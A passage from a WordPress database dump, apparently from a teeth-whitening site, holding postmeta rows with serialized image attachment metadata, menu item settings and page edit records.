peg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"E-PL1\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(167,85,'_wp_attached_file','2018/01/teeth-check-Copy.jpg'),(168,85,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:872;s:6:\"height\";i:466;s:4:\"file\";s:28:\"2018/01/teeth-check-Copy.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"teeth-check-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"teeth-check-Copy-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"teeth-check-Copy-768x410.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:28:\"teeth-check-Copy-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169,15,'_thumbnail_id','82'),(170,87,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(171,87,'_menu_item_type','post_type'),(172,87,'_menu_item_menu_item_parent','0'),(173,87,'_menu_item_object_id','20'),(174,87,'_menu_item_object','page'),(175,87,'_menu_item_target',''),(176,87,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(177,87,'_menu_item_xfn',''),(178,87,'_menu_item_url',''),(180,88,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(181,88,'_menu_item_type','post_type'),(182,88,'_menu_item_menu_item_parent','0'),(183,88,'_menu_item_object_id','15'),(184,88,'_menu_item_object','page'),(185,88,'_menu_item_target',''),(186,88,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(187,88,'_menu_item_xfn',''),(188,88,'_menu_item_url',''),(190,89,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(191,89,'_menu_item_type','post_type'),(192,89,'_menu_item_menu_item_parent','0'),(193,89,'_menu_item_object_id','17'),(194,89,'_menu_item_object','page'),(195,89,'_menu_item_target',''),(196,89,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(197,89,'_menu_item_xfn',''),(198,89,'_menu_item_url',''),(200,90,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(201,90,'_menu_item_type','post_type'),(202,90,'_menu_item_menu_item_parent','0'),(203,90,'_menu_item_object_id','13'),(204,90,'_menu_item_object','page'),(205,90,'_menu_item_target',''),(206,90,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(207,90,'_menu_item_xfn',''),(208,90,'_menu_item_url',''),(210,91,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(211,91,'_menu_item_type','post_type'),(212,91,'_menu_item_menu_item_parent','95'),(213,91,'_menu_item_object_id','7'),(214,91,'_menu_item_object','page'),(215,91,'_menu_item_target',''),(216,91,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(217,91,'_menu_item_xfn',''),(218,91,'_menu_item_url',''),(220,92,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(221,92,'_menu_item_type','post_type'),(222,92,'_menu_item_menu_item_parent','0'),(223,92,'_menu_item_object_id','72'),(224,92,'_menu_item_object','page'),(225,92,'_menu_item_target',''),(226,92,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(227,92,'_menu_item_xfn',''),(228,92,'_menu_item_url',''),(230,93,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(231,93,'_menu_item_type','post_type'),(232,93,'_menu_item_menu_item_parent','95'),(233,93,'_menu_item_object_id','9'),(234,93,'_menu_item_object','page'),(235,93,'_menu_item_target',''),(236,93,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(237,93,'_menu_item_xfn',''),(238,93,'_menu_item_url',''),(240,94,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(241,94,'_menu_item_type','post_type'),(242,94,'_menu_item_menu_item_parent','95'),(243,94,'_menu_item_object_id','11'),(244,94,'_menu_item_object','page'),(245,94,'_menu_item_target',''),(246,94,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(247,94,'_menu_item_xfn',''),(248,94,'_menu_item_url',''),(250,95,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(251,95,'_menu_item_type','post_type'),(252,95,'_menu_item_menu_item_parent','0'),(253,95,'_menu_item_object_id','5'),(254,95,'_menu_item_object','page'),(255,95,'_menu_item_target',''),(256,95,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(257,95,'_menu_item_xfn',''),(258,95,'_menu_item_url',''),(272,5,'_thumbnail_id','85'),(273,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(274,98,'_edit_last','1'),(275,98,'_edit_lock','1541510533:1'),(276,98,'_thumbnail_id','84'),(279,13,'_thumbnail_id','47'),(280,103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(281,103,'_edit_last','1'),(282,103,'_edit_lock','1541508014:1'),(283,104,'_wp_attached_file','2018/01/3-colours.jpg'),(284,104,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:635;s:4:\"file\";s:21:\"2018/01/3-colours.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"3-colours-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"3-colours-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"3-colours-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:21:\"3-colours-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(285,103,'_thumbnail_id','104'),(288,106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(289,106,'_edit_last','1'),(292,106,'_edit_lock','1541508146:1'),(293,7,'_thumbnail_id','80'),(294,109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(295,109,'_edit_last','1'),(296,109,'_edit_lock','1517301505:1'),(297,109,'_wp_page_template','default'),(298,109,'_wpb_vc_js_status','false'),(300,113,'_wp_attached_file','2018/02/beauty-6.png'),(301,113,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:276;s:6:\"height\";i:80;s:4:\"file\";s:20:\"2018/02/beauty-6.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"beauty-6-150x80.png\";s:5:\"width\";i:150;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:19:\"beauty-6-240x80.png\";s:5:\"width\";i:240;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(303,127,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(304,127,'_edit_last','1'),(305,127,'_edit_lock','1537964909:1'),(308,129,'_wp_attached_file','2018/08/white-teeth.jpg'),(309,129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:23:\"2018/08/white-teeth.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"white-teeth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"white-teeth-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"white-teeth-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:23:\"white-teeth-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"85\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(310,129,'_wp_attachment_image_alt','Teeth whitening can help you to achieve the perfect smile'),(311,127,'_thumbnail_id','129'),(315,133,'_wp_attached_file','2018/08/smilemoredental.jpg'),(316,133,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:165;s:6:\"height\";i:69;s:4:\"file\";s:27:\"2018/08/smilemoredental.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"smilemoredental-150x69.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:69;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:7:\"vanilla\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1536062988\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(317,133,'_wp_attachment_image_alt','Teeth Whitening at Smile More Dental'),(321,137,'_wp_attached_file','2018/08/bbbeauty.png'),(322,137,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:154;s:6:\"height\";i:116;s:4:\"file\";s:20:\"2018/08/bbbeauty.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"bbbeauty-150x116.png\";s:5:\"width\";i:150;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(323,137,'_wp_attachment_image_alt','Teeth whitening treatments'),(325,140,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(326,140,'_menu_item_type','post_type'),(327,140,'_menu_item_menu_item_parent','0'),(328,140,'_menu_item_object_id','127'),(329,140,'_menu_item_object','post'),(330,140,'_menu_item_target',''),(331,140,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(332,140,'_menu_item_xfn',''),(333,140,'_menu_item_url',''),(337,142,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(338,142,'_edit_last','1'),(339,142,'_edit_lock','1537793681:1'),(340,145,'_wp_attached_file','2018/09/dentist-2530990_960_720.jpg'),(341,145,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:637;s:4:\"file\";s:35:\"2018/09/dentist-2530990_960_720.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"dentist-2530990_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"dentist-2530990_960_720-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"dentist-2530990_960_720-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:35:\"dentist-2530990_960_720-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D300\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"56\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(342,146,'_wp_attached_file','2018/09/doctor-1149149_960_720.jpg'),(343,146,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:34:\"2018/09/doctor-1149149_960_720.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"doctor-1149149_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"doctor-1149149_960_720-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"doctor-1149149_960_720-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:34:\"doctor-1149149_960_720-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(344,147,'_wp_attached_file','2018/09/woman-3498849_960_720.jpg'),(345,147,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:449;s:4:\"file\";s:33:\"2018/09/woman-3498849_960_720.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"woman-3498849_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"woman-3498849_960_720-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"woman-3498849_960_720-768x359.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:33:\"woman-3498849_960_720-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(346,142,'_thumbnail_id','147'),(348,150,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(349,150,'_edit_last','1'),(350,150,'_edit_lock','1537962664:1'),(351,151,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(352,151,'_edit_last','1'),(353,151,'_wp_page_template','default'),(354,151,'_wpb_vc_js_status','false'),(355,151,'_edit_lock','1537962847:1'),(356,154,'_wp_attached_file','2018/09/girl-1162512_960_720.jpg'),(357,154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:600;s:4:\"file\";s:32:\"2018/09/girl-1162512_960_720.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"girl-1162512_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"girl-1162512_960_720-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"girl-1162512_960_720-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:32:\"girl-1162512_960_720-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(358,155,'_wp_attached_file','2018/09/smile-122705_960_720.jpg'),(359,155,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:545;s:4:\"file\";s:32:\"2018/09/smile-122705_960_720.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"smile-122705_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"smile-122705_960_720-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"smile-122705_960_720-768x436.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:436;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:32:\"smile-122705_960_720-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(360,151,'_thumbnail_id','155'),(361,159,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(362,159,'_menu_item_type','post_type'),(363,159,'_menu_item_menu_item_parent','140'),(364,159,'_menu_item_object_id','151'),(365,159,'_menu_item_object','page'),(366,159,'_menu_item_target',''),(367,159,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(368,159,'_menu_item_xfn',''),(369,159,'_menu_item_url',''),(372,127,'_wp_page_template','default'),(373,127,'_wpb_vc_js_status','false'),(374,161,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(375,161,'_edit_last','1'),(376,161,'_wp_page_template','default'),(377,162,'_wpb_vc_js_status','false'),(378,162,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(379,162,'_menu_item_type','post_type'),(380,162,'_menu_item_menu_item_parent','140'),(381,162,'_menu_item_object_id','161'),(382,162,'_menu_item_object','page'),(383,162,'_menu_item_target',''),(384,162,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(385,162,'_menu_item_xfn',''),(386,162,'_menu_item_url',''),(387,161,'_wpb_vc_js_status','false'),(388,161,'_edit_lock','1537968629:1'),(389,164,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(390,164,'_edit_last','1'),(391,164,'_wp_page_template','default'),(392,165,'_wpb_vc_js_status','false'),(393,165,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(394,165,'_menu_item_type','post_type'),(395,165,'_menu_item_menu_item_parent','140'),(396,165,'_menu_item_object_id','164'),(397,165,'_menu_item_object','page'),(398,165,'_menu_item_target',''),(399,165,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(400,165,'_menu_item_xfn',''),(401,165,'_menu_item_url',''),(402,164,'_wpb_vc_js_status','false'),(403,164,'_edit_lock','1537968642:1'),(404,167,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(405,167,'_edit_last','1'),(406,167,'_wp_page_template','default'),(407,168,'_wpb_vc_js_status','false'),(408,168,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(409,168,'_menu_item_type','post_type'),(410,168,'_menu_item_menu_item_parent','89'),(411,168,'_menu_item_object_id','167'),(412,168,'_menu_item_object','page'),(413,168,'_menu_item_target',''),(414,168,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(415,168,'_menu_item_xfn',''),(416,168,'_menu_item_url',''),(417,167,'_wpb_vc_js_status','false'),(418,167,'_edit_lock','1537968652:1'),(426,181,'_wp_attached_file','2018/11/teeth-1652937_960_720.jpg'),(427,181,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:696;s:4:\"file\";s:33:\"2018/11/teeth-1652937_960_720.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"teeth-1652937_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"teeth-1652937_960_720-300x218.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"teeth-1652937_960_720-768x557.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:557;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:33:\"teeth-1652937_960_720-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 700D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:4:\"6400\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(429,190,'_wp_attached_file','2019/02/iStock-936967024.jpg'),(430,190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1254;s:6:\"height\";i:836;s:4:\"file\";s:28:\"2019/02/iStock-936967024.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"iStock-936967024-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"iStock-936967024-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"iStock-936967024-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"iStock-936967024-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:28:\"iStock-936967024-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:24:\"Getty Images/iStockphoto\";s:6:\"camera\";s:15:\"Canon EOS 5DS R\";s:7:\"caption\";s:199:\"Beauty Woman Portrait. Closeup Of Beautiful Happy Girl With Perfect Smile, White Teeth Smiling At Camera. Attractive Healthy Young Female With Fresh Natural Face Makeup Indoors. High Resolution Image\";s:17:\"created_timestamp\";s:10:\"1469194930\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:55:\"Beauty Woman Portrait. Girl With Beautiful Face Smiling\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:1:{i:0;s:64:\"tooth,stomatology,sexy,natural,makeup,lips,lifestyle,joyful,fema\";}}}'),(431,190,'_wp_attachment_image_alt','What are your teeth whitening 